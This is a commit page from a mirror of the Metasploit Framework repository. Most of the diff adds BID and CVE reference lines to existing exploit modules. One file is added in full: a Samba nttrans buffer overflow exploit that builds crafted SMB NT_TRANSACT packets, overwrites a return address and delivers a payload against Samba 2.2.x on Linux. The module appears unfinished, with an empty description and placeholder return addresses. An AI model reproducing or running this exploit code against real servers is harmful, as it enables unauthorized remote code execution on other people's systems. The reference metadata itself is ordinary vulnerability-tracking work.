infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Reference updates 

git-svn-id: file:///home/svn/framework3/trunk@4154 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-11-28 17:18:43 +00:00
parent 84f7a28fc7
commit 810f80612b
31 changed files with 196 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
modules/exploits/irix/lpd/tagprinter_exec.rb
View File

@ -19,6 +19,7 @@ class Exploits::Irix::Lpd::TagPrinterExec < Msf::Exploit::Remote
'References' =>
[
['OSVDB', '8573'],
['CVE', '2001-0800'],
['URL', 'http://www.lsd-pl.net/code/IRIX/irx_lpsched.c'],
['MIL', '35'],
],

2
modules/exploits/linux/ids/snortbopre.rb
View File

@ -20,6 +20,8 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
['BID', '15131'],
['CVE', '2005-3252'],
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>

145
modules/exploits/multi/samba/nttrans.rb Normal file
View File

@ -0,0 +1,145 @@
require 'msf/core'
module Msf
class Exploits::Multi::Samba::NTTrans_Overflow < Msf::Exploit::Remote
include Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Samba nttrans Overflow',
'Description' => %q{
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 3425 $',
'References' =>
[
],
'Privileged' => true,
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'MinNops' => 512,
},
'Targets' =>
[
["Samba 2.2.x Linux x86",
{
'Arch' => ARCH_X86,
'Platform' => 'linux',
'Rets' => [0x01020304, 0x41424344],
},
],
],
'DisclosureDate' => 'Apr 7 2003'
))
register_options(
[
Opt::RPORT(139)
], self.class)
end
def exploit
# 0x081fc968
pattern = Rex::Text.pattern_create(12000)
pattern[532, 4] = [0x81b847c].pack('V')
pattern[836, payload.encoded.length] = payload.encoded
# 0x081b8138
connect
smb_login
targ_address = 0xfffbb7d0
#
# Send a NTTrans request with ParameterCountTotal set to the buffer length
#
subcommand = 1
param = ''
body = ''
setup_count = 0
setup_data = ''
data = param + body
pkt = CONST::SMB_NTTRANS_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length + (setup_count * 2) - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
pkt['Payload'].v['ParamCountTotal'] =12000
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCountMax'] = 1024
pkt['Payload'].v['DataCountMax'] = 65504
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['SetupCount'] = setup_count
pkt['Payload'].v['SetupData'] = setup_data
pkt['Payload'].v['Subcommand'] = subcommand
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
#
# Send a NTTrans secondary request with the magic displacement
#
param = pattern
body = ''
data = param + body
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
base_offset = pkt.to_s.length - 4
param_offset = base_offset
data_offset = param_offset + param.length
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['Flags1'] = 0x18
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
pkt['Payload']['SMB'].v['WordCount'] = 18
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = body.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['ParamOffset'] = param_offset
pkt['Payload'].v['ParamDisplace'] = targ_address
pkt['Payload'].v['DataCount'] = body.length
pkt['Payload'].v['DataOffset'] = data_offset
pkt['Payload'].v['Payload'] = data
self.simple.client.smb_send(pkt.to_s)
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
handler
end
end
end

2
modules/exploits/osx/afp/loginext.rb
View File

@ -22,6 +22,8 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '10271'],
[ 'CVE', '2004-0430'],
[ 'OSVDB', '5762' ],
[ 'MIL', '2' ],
],

2
modules/exploits/osx/samba/trans2open.rb
View File

@ -19,6 +19,8 @@ class Exploits::Osx::Samba::Trans2Open < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7294'],
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'MIL', '54'],

1
modules/exploits/solaris/dtspcd/heap_noir.rb
View File

@ -21,6 +21,7 @@ class Exploits::Solaris::Dtspcd::Heap_Noir < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '3517'],
[ 'OSVDB', '4503'],
[ 'CVE', '2001-0803'],
[ 'URL', 'http://www.cert.org/advisories/CA-2001-31.html'],

2
modules/exploits/solaris/samba/trans2open.rb
View File

@ -22,6 +22,8 @@ class Exploits::Solaris::Samba::Trans2Open_Overflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7294'],
[ 'CVE', '2003-0201'],
[ 'OSVDB', '4469'],
[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
[ 'MIL', '55'],

2
modules/exploits/solaris/sunrpc/solaris_sadmind_exec.rb
View File

@ -22,6 +22,8 @@ class Exploits::Solaris::Sunrpc::SadmindExec < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
['BID', '8615'],
['CVE', '2003-0722'],
['OSVDB', '4585'],
['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],
['MIL', '64']

1
modules/exploits/unix/http/php_vbulletin_template.rb
View File

@ -20,6 +20,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'BID', '12622'],
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],

1
modules/exploits/windows/backupexec/name_service.rb
View File

@ -30,6 +30,7 @@ class Exploits::Windows::Backupexec::BackupExecNSOverflow < Msf::Exploit::Remote
'References' =>
[
[ 'OSVDB', '12418'],
[ 'BID', '11974'],
[ 'CVE', '2004-1172'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
[ 'MIL', '10'],

1
modules/exploits/windows/backupexec/remote_agent.rb
View File

@ -22,6 +22,7 @@ class Exploits::Windows::Backupexec::BackupExecAgentOverflow < Msf::Exploit::Rem
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '14022'],
[ 'CVE', '2005-0773'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'],
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'],

2
modules/exploits/windows/brightstor/universal_agent.rb
View File

@ -21,6 +21,8 @@ class Exploits::Windows::Brightstor::BrightstorUniversalAgentOverflow < Msf::Exp
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '13102'],
[ 'CVE', '2005-1018'],
[ 'MIL', '16'],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities'],

2
modules/exploits/windows/browser/aim_goaway.rb
View File

@ -29,6 +29,8 @@ class Exploits::Windows::Browser::AimGoaway < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', ' 10889'],
[ 'CVE', ' 2004-0636'],
[ 'OSVDB', '8398' ],
[ 'MIL', '3' ],
[ 'URL', 'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities' ],

3
modules/exploits/windows/driver/dlink_wifi_rates.rb
View File

@ -33,6 +33,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
solution for any of the seven flaws listed at the time of writing:
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
DWL-G132 driver (v1.21).
This module depends on the Lorcon library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon documentation
(external/ruby-lorcon/README) for more information.

2
modules/exploits/windows/ftp/cesarftp_mkd.rb
View File

@ -17,6 +17,8 @@ class Exploits::Windows::Ftp::Cesarftp_Mkd < Msf::Exploit::Remote
'Version' => '$Revision: 3583 $',
'References' =>
[
[ 'BID', '18586'],
[ 'CVE', '2006-2961'],
[ 'URL', 'http://secunia.com/advisories/20574/' ],
],
'Privileged' => true,

2
modules/exploits/windows/ftp/freeftpd_user.rb
View File

@ -21,6 +21,8 @@ class Exploits::Windows::Ftp::FreeFTPDUserOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '15457'],
[ 'CVE', '2005-3683'],
[ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
],

2
modules/exploits/windows/ftp/globalscapeftp_input.rb
View File

@ -19,7 +19,9 @@ class Exploits::Windows::Ftp::GlobalScapeInputOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '13454'],
[ 'OSVDB', '16049'],
[ 'CVE', '2005-1415'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
[ 'MIL', '22'],
],

2
modules/exploits/windows/ftp/warftpd_165_user.rb
View File

@ -18,6 +18,8 @@ class Exploits::Windows::Ftp::WarFtpd165 < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '10078' ],
[ 'CVE', '1999-0256'],
[ 'OSVDB', '875' ],
[ 'MIL', '75' ],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html' ],

2
modules/exploits/windows/http/apache_chunked.rb
View File

@ -27,6 +27,8 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'BID', '5033' ],
[ 'CVE', '2002-0392' ],
[ 'OSVDB', '838'],
[ 'URL', 'http://lists.insecure.org/lists/bugtraq/2002/Jun/0184.html'],
[ 'MIL', '4'],

2
modules/exploits/windows/http/ia_webmail.rb
View File

@ -19,6 +19,8 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
'Version' => '$Revision: 3110 $',
'References' =>
[
[ 'BID', '8965'],
[ 'CVE', '2003-1192'],
[ 'OSVDB', '2757'],
[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
[ 'MIL', '24'],

2
modules/exploits/windows/iis/ms01_023_printer.rb
View File

@ -23,7 +23,9 @@ class Exploits::Windows::Iis::MS01_023_PRINTER < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '2674'],
[ 'OSVDB', '3323'],
[ 'CVE', '2001-0241'],
[ 'MSB', 'MS01-023'],
[ 'URL', 'http://seclists.org/lists/bugtraq/2001/May/0005.html'],
[ 'MIL', '27'],

1
modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
View File

@ -20,6 +20,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '7116'],
[ 'OSVDB', '4467'],
[ 'MSB', 'MS03-007'],
[ 'CVE', '2003-0109'],

1
modules/exploits/windows/imap/imail_delete.rb
View File

@ -23,6 +23,7 @@ class Exploits::Windows::Imap::IMailIMAPDeleteOverflow < Msf::Exploit::Remote
[
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
[ 'CVE', '2004-1520'],
[ 'MIL', '33'],
],

2
modules/exploits/windows/isapi/fp30reg_chunked.rb
View File

@ -22,7 +22,9 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9007'],
[ 'OSVDB', '2952'],
[ 'CVE', ' 2003-0822'],
[ 'MSB', 'MS03-051'],
[ 'MIL', '29'],

2
modules/exploits/windows/isapi/nsiislog_post.rb
View File

@ -24,7 +24,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '8035'],
[ 'OSVDB', '4535'],
[ 'CVE', '2003-0349'],
[ 'MSB', 'MS03-022'],
[ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'],
[ 'MIL', '30'],

2
modules/exploits/windows/ldap/imail_thc.rb
View File

@ -20,6 +20,8 @@ class Exploits::Windows::Ldap::IMAIL_LDAP_THC < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9682'],
[ 'CVE', '2004-0297'],
[ 'OSVDB', '3984'],
[ 'URL', 'http://secunia.com/advisories/10880/'],
[ 'MIL', '34'],

2
modules/exploits/windows/mssql/ms02_039_slammer.rb
View File

@ -23,6 +23,8 @@ class Exploits::Windows::Mssql::MS02_039_ResOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '5310'],
[ 'CVE', '2002-0649'],
[ 'OSVDB', '4578'],
[ 'MSB', 'MS02-039'],
[ 'MIL', '44'],

2
modules/exploits/windows/mssql/ms02_056_hello.rb
View File

@ -22,6 +22,8 @@ class Exploits::Windows::Mssql::MS02_056_HelloOverflow < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '5411'],
[ 'CVE', '2002-1123'],
[ 'MSB', 'MS02-056'],
[ 'CVE', '2002-1123'],
[ 'MIL', '43'],

1
modules/exploits/windows/smb/ms04_007_killbill.rb
View File

@ -36,6 +36,7 @@ class Exploits::Windows::Smb::MS04_007_ASN1_KILLBILL < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '9633'],
[ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
[ 'MSB', 'MS04-007'],
[ 'CVE', '2003-0818'],

1
modules/exploits/windows/smb/ms04_031_netdde.rb
View File

@ -22,6 +22,7 @@ class Exploits::Windows::Smb::MS04_039_NETDDE < Msf::Exploit::Remote
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '11372'],
[ 'OSVDB', '10689'],
[ 'CVE', '2004-0206'],
[ 'MSB', 'MS04-031'],

1
modules/exploits/windows/smtp/ms06_019_exchange.rb
View File

@ -19,6 +19,7 @@ class Exploits::Windows::Smtp::MS06_019_EXCHANGE < Msf::Exploit::Remote
'Version' => '$Revision: 3744 $',
'References' =>
[
[ 'BID', '17908'],
[ 'CVE', '2006-0027'],
[ 'MSB', 'MS06-019'],